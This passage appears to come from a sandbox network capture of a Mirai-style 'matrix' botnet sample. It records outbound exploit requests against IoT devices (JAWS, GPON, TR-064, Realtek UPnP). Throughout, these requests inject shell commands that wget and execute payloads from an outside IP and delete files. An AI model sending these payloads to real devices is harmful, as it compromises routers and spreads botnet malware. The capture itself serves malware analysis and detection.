6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        871192.168.2.134023034.107.17.4080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:03.515002012 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        872192.168.2.1360458145.12.242.14580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:03.527724028 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:03.714595079 CET133INHTTP/1.0 302 Moved Temporarily
                                                        Location: https:///shell?cd+/tmp;rm+-rf+*;wget+
                                                        Connection: close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        873192.168.2.135431094.230.10.11380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:03.560153008 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        874192.168.2.1340878154.23.156.13080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:03.639853954 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:05.196306944 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:05.492944002 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                                                        Mar 21, 2024 05:23:07.006918907 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        875192.168.2.135353662.151.180.4480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:03.683406115 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:04.301321030 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:04.422668934 CET525INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:22:54 GMT
                                                        Connection: close
                                                        Content-Length: 334
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 48 6f 73 74 6e 61 6d 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        876192.168.2.135753437.16.29.2017547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:03.907215118 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:04.180659056 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        877192.168.2.1359298197.203.156.687547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:04.052603006 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        878192.168.2.135973235.190.100.11352869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:04.559041023 CET987OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        879192.168.2.135975635.190.100.11352869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:04.647557974 CET987OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        880192.168.2.1351078221.121.70.23152869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:04.767430067 CET987OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:05.069117069 CET987INPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
